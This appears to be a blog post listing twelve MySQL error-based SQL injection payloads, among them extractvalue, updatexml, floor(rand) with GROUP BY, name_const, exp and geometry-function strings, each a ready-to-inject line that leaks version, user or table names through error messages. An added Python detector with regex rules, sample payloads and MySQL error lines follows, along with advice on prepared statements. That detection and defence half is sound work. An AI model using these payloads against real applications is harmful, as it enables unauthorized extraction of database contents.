12 Error-Based Injection Techniques for MySQL

1. Error via floor
and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);  

2. Error via ExtractValue
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));  

3. Error via UpdateXml
and 1=(updatexml(1,concat(0x3a,(select user())),1))  

4. Error via NAME_CONST
and exists(select * from (select * from(select name_const(version(),0))a join (select name_const(version(),0))b)c);  

5. Extracting column names via a join error

Note: this method is used when the table name is already known (表名 in the queries below is the placeholder for that table name, 已知的字段 for a column already obtained).

select * from (select * from 表名 a join 表名 b) c  
After obtaining one column, use USING to obtain the next column:
select * from (select * from 表名 a join 表名 b using (已知的字段,已知的字段)) c  

6. Error via exp
and exp(~(select * from (select user() ) a) );  

Note: because of MySQL version differences, I could not reproduce this method locally; the screenshot is from Baidu.

7. Error via GeometryCollection()
and geometrycollection((select * from(select * from(select user())a)b));  

8. Error via polygon()
and polygon((select * from(select * from(select user())a)b));  

9. Error via multipoint()
and multipoint((select * from(select * from(select user())a)b));  

10. Error via multilinestring()
and multilinestring((select * from(select * from(select user())a)b));  

11. Error via multipolygon()
and multipolygon((select * from(select * from(select user())a)b));  

12. Error via linestring()
and linestring((select * from(select * from(select user())a)b));  
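All twelve techniques depend on a small set of MySQL functions (floor/rand with GROUP BY, extractvalue, updatexml, name_const, exp, and the geometry constructors) and each provokes a recognisable server error. The following detection helper is an added example, not code from the original post: it scans request parameter values for those function signatures after normalising URL encoding and comment tricks, and separately classifies MySQL error strings that leak into application logs or responses. Rule names are constructed labels, and the sample parameter values and error lines at the bottom are constructed to resemble the payloads on this page and the errors MySQL raises for them, not captured traffic.

```python
"""
Defender-side detection for the twelve error-based injection primitives above.

Added example, not code from the original post. Two checks: the request
parameter (where the payload arrives) and the MySQL error text an unhandled
exception leaks into a response or log (the symptom). Rule names are
constructed labels; sample data at the bottom is constructed.
"""
import re
from urllib.parse import unquote_plus

# Request-side rules keyed on the function each technique needs. Bare keywords
# such as SELECT or JOIN are deliberately not matched on their own: the join
# technique (item 5) has no distinctive function and is caught on the error side.
REQUEST_RULES = {
    "floor_rand_groupby": re.compile(
        r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\)[\s\S]{0,200}group\s+by", re.I),
    "extractvalue": re.compile(r"\bextractvalue\s*\(", re.I),
    "updatexml": re.compile(r"\bupdatexml\s*\(", re.I),
    "name_const": re.compile(r"\bname_const\s*\(", re.I),
    "exp_overflow": re.compile(r"\bexp\s*\(\s*~", re.I),
    "geometry_subquery": re.compile(
        r"\b(geometrycollection|multipolygon|multilinestring|multipoint|polygon|linestring)"
        r"\s*\(\s*\(\s*select\b", re.I),
}

# Error-side rules keyed on the MySQL error text each technique provokes.
ERROR_RULES = {
    "floor_rand_groupby": re.compile(r"Duplicate entry '.*' for key '<?group_key>?'"),
    "xpath_extractvalue_updatexml": re.compile(r"XPATH syntax error"),
    "exp_overflow": re.compile(r"DOUBLE value is out of range in 'exp\("),
    "geometry_subquery": re.compile(r"Illegal non geometric .* value found during parsing"),
    "duplicate_column_join_or_name_const": re.compile(r"Duplicate column name"),
}


def normalise(value: str) -> str:
    """URL-decode twice (double encoding is common), unwrap /*!NNNNN ... */
    version comments so their body stays visible, drop ordinary comments and
    collapse whitespace, so the rules see roughly what the server would parse."""
    text = unquote_plus(unquote_plus(value))
    text = re.sub(r"/\*!\d*", " ", text)                 # "/*!50000select*/" -> " select*/"
    text = re.sub(r"/\*.*?\*/", " ", text, flags=re.S)   # "/* comment */"    -> " "
    text = text.replace("*/", " ")                       # dangling end of a version comment
    return re.sub(r"\s+", " ", text).strip()


def scan_parameter(value: str) -> list[str]:
    """Names of request-side rules that match one parameter value."""
    text = normalise(value)
    return [name for name, rx in REQUEST_RULES.items() if rx.search(text)]


def scan_error(message: str) -> list[str]:
    """Names of error-side rules that match one MySQL error string."""
    return [name for name, rx in ERROR_RULES.items() if rx.search(message)]


# Constructed samples: parameter values shaped like the payloads above (one of
# them URL-encoded, one wrapped in a version comment) and error lines shaped
# like the MySQL errors they raise. Not captured traffic.
SAMPLE_PARAMETERS = {
    "extractvalue": "1 and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)))",
    "floor_encoded": "1+and+(select+1+from+(select+count(*)%2Cconcat(version()%2Cfloor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)",
    "polygon_versioned": "1 and polygon((/*!50000select*/ * from(select * from(select user())a)b))",
    "benign": "42",
}
SAMPLE_ERRORS = [
    "ERROR 1062 (23000): Duplicate entry '5.7.301' for key 'group_key'",
    "ERROR 1105 (HY000): XPATH syntax error: '\\root@localhost'",
    "ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select 'root@localhost' from dual)))'",
    "ERROR 1060 (42S21): Duplicate column name 'id'",
    "ERROR 1146 (42S02): Table 'shop.orders' doesn't exist",
]

if __name__ == "__main__":
    for label, value in SAMPLE_PARAMETERS.items():
        print(f"param {label:18} -> {scan_parameter(value)}")
    for line in SAMPLE_ERRORS:
        print(f"error {line[:42]:42} -> {scan_error(line)}")
```

The error-side rules are the more reliable signal in practice: the join technique of item 5 and the NAME_CONST technique both surface as error 1060 "Duplicate column name", which a request-side rule cannot match without flagging every legitimate JOIN. Either way, the root fix is the same for all twelve: user input must reach MySQL only as a bound parameter of a prepared statement, and database error text must never be returned to the client, since every technique here relies on reading the error message.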

zhutougg
